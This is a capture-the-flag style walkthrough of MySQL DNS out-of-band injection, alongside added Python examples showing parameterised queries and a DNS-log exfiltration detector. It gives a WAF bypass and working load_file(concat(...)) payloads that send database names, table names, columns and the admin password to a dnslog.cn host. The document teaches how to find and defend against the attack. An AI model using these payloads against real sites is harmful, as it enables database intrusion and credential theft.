MySQL injection: DNS injection
Principle of the lab target: the database server is made to access a UNC path, and the DNS server of that path's host logs every name it is asked to resolve. The result of a subquery is concatenated into the host part of the path, load_file() tries to read the shared file, the domain name that was accessed is recorded, and the blind injection effectively becomes an error-reporting injection. In other words, a blind injection is turned into one with visible output: a remote shared file is read, the query result is concatenated into the domain name with a string function, that domain is resolved while the file is being accessed, and the result is read from the DNS log after it has been recorded.
1. Looking at the lab, first try the simplest GET parameter injection.
The id parameter is spliced directly into the SQL statement, and the database is queried through the mysqli_connect() connection. Naturally we enter ?id=1 first; the test
page loads normally, so we continue by entering `and 1=1`,
but this is blocked by the website firewall. To bypass it, append /1.txt after the URL: the WAF treats 1.txt as a harmless, whitelisted file type and considers the request trustworthy, and when 1.txt is not found the server falls back to the parent path for handling.
This is an older WAF.
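The writeup names the root cause in passing: the id parameter is spliced straight into the SQL text, which is why `and 1=1` / `and 1=2` behave as a boolean oracle and why the later sleep() and load_file() subqueries can run at all. The following added example (not the lab's code) shows that splicing beside the parameterised form. An in-memory sqlite3 database is an assumed stand-in for the lab's MySQL so the example runs offline; the table names and rows are constructed.

```python
import sqlite3

# Assumption: an in-memory sqlite3 database stands in for the lab's MySQL so the
# example runs offline. Table names and rows below are constructed sample data.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    conn.execute("CREATE TABLE admin (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", [(1, "hello"), (2, "world")])
    conn.execute("INSERT INTO admin VALUES (1, 'admin', 'sample-secret')")
    return conn


def lookup_vulnerable(conn, user_id):
    """The pattern the writeup describes: the id parameter is spliced straight
    into the SQL text, so everything after the number is executed as SQL.
    '1 and 1=1' and '1 and 1=2' then give different results, which is the
    boolean oracle the writeup checks for before moving on to sleep() and DNS."""
    sql = "SELECT id, title FROM news WHERE id=" + user_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Hardened form: the parameter is validated as an integer and bound with a
    placeholder, so its text can never become part of the statement."""
    try:
        id_value = int(user_id)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer") from None
    return conn.execute("SELECT id, title FROM news WHERE id=?", (id_value,)).fetchall()


def safe_rejects(user_id):
    """True if the hardened lookup refuses the value instead of running it."""
    try:
        lookup_safe(make_db(), user_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1 and 1=1", "1 and 1=2"):
        print(f"vulnerable {probe!r:14} -> {lookup_vulnerable(db, probe)}")
        print(f"safe       {probe!r:14} -> "
              + ("rejected" if safe_rejects(probe) else str(lookup_safe(db, probe))))
```

With mysqli the equivalent fix is a prepared statement with bind_param instead of concatenating $_GET['id']. The DNS channel itself also depends on load_file() being allowed to read an arbitrary path: it requires the FILE privilege and honours secure_file_priv, so an application account without FILE, and secure_file_priv pointed at a local directory, stops the server from reaching a UNC path even if an injection exists.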
The bypass succeeds and the page returns normally. Next enter `and 1=2` to judge from the page echo:
the page shows no echo, so we enter sleep(5). The
page shows a noticeable delay, so we can conclude that this page has time-based (delayed) injection.
Time-based injection would work, but it costs a lot of time, so we try DNS injection instead and query the database name through DNS error reporting.
In the URL field, enter
?id=1 and (select load_file(concat('//',(select database()),'.57t2co.dnslog.cn/abc')))
and get the database name.
Continue to query the table name; enter in the URL
?id=1 and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.57t2co.dnslog.cn/abc')))
Get the table name, then use limit to enumerate all table names
?id=1 and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 1,1),'.57t2co.dnslog.cn/abc')))
?id=1 and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 2,1),'.57t2co.dnslog.cn/abc')))
Only two table names are found.
Judging that the flag may be in the admin table, we query the admin table's data by
entering (note that the path prefix is now written as '\\\\', which the MySQL string literal unescapes to the two backslashes of a UNC path; it is equivalent to the '//' prefix used above)
?id=1 and (select load_file(concat('\\\\',(select column_name from information_schema.columns where TABLE_NAME='admin' limit 0,1),'.57t2co.dnslog.cn/abc')))
Continue using limit to query the field names
?id=1 and (select load_file(concat('\\\\',(select column_name from information_schema.columns where TABLE_NAME='admin' limit 1,1),'.57t2co.dnslog.cn/abc')))
…
?id=1 and (select load_file(concat('\\\\',(select column_name from information_schema.columns where TABLE_NAME='admin' limit 3,1),'.57t2co.dnslog.cn/abc')))
ID, username, password: there are only three columns. The flag may be in the password field, so we query the password data
?id=1 and (select load_file(concat('\\\\',(select password from admin limit 0,1),'.57t2co.dnslog.cn/abc')))
The DNS log records: 1flag1good1
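Every step above leaves the same artefact on the defender's side: the database host resolving names it never normally resolves, each carrying a query result as its leftmost label. The following added example (not part of the writeup) parses constructed resolver log lines, first recovering the leaked labels when the attacker's domain is already known, then flagging the generic shape when it is not. The log format, the sample labels, and the three-label parent heuristic are assumptions.

```python
import re
from collections import defaultdict

# Constructed resolver log lines. Assumption: a simple "timestamp client query
# TYPE NAME" format stands in for a real BIND/dnsmasq query log; the labels in
# front of the dnslog domain are constructed sample values, not the lab's real ones.
SAMPLE_LOG = """\
2024-05-01T12:00:01Z 10.0.0.21 query A www.example.com
2024-05-01T12:00:03Z 10.0.0.21 query A sampledb.57t2co.dnslog.cn
2024-05-01T12:00:05Z 10.0.0.21 query A admin.57t2co.dnslog.cn
2024-05-01T12:00:07Z 10.0.0.8 query A mail.example.com
2024-05-01T12:00:09Z 10.0.0.21 query A news.57t2co.dnslog.cn
2024-05-01T12:00:11Z 10.0.0.21 query A 1flag1good1.57t2co.dnslog.cn
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) query (?P<qtype>\S+) (?P<name>\S+)$")


def parse_line(line):
    """Split one log line into its fields, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def leaked_labels(log_text, controlled_suffix):
    """Queries whose name ends in a known attacker-controlled suffix. The
    prefix is exactly what concat() put in front of the domain, i.e. the
    subquery result, so this reconstructs what was exfiltrated and from where."""
    suffix = "." + controlled_suffix.lower()
    found = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        name = rec["name"].rstrip(".").lower()
        if name.endswith(suffix):
            found.append((rec["client"], name[: -len(suffix)]))
    return found


def fan_out_by_client(log_text, min_unique=3):
    """Generic detector for when the suffix is not known: count the distinct
    subdomains each client asks for under one parent domain. A database host
    resolving many different labels under a single parent is the shape of DNS
    exfiltration. Assumption: the parent is taken as the last three labels; a
    real deployment would use the public suffix list instead."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        labels = rec["name"].rstrip(".").lower().split(".")
        if len(labels) < 4:
            continue
        parent = ".".join(labels[-3:])
        seen[(rec["client"], parent)].add(".".join(labels[:-3]))
    return {key: len(subs) for key, subs in seen.items() if len(subs) >= min_unique}


if __name__ == "__main__":
    for client, label in leaked_labels(SAMPLE_LOG, "57t2co.dnslog.cn"):
        print(f"{client} leaked label {label!r}")
    for (client, parent), n in fan_out_by_client(SAMPLE_LOG).items():
        print(f"{client} resolved {n} distinct names under {parent}")
```

The second function is the one worth wiring to an alert: a database server has no routine reason to resolve a stream of distinct subdomains under one parent. The channel also only works because the database segment can reach arbitrary DNS and SMB destinations, so restricting that egress at the network boundary removes it regardless of whether the injection itself is fixed.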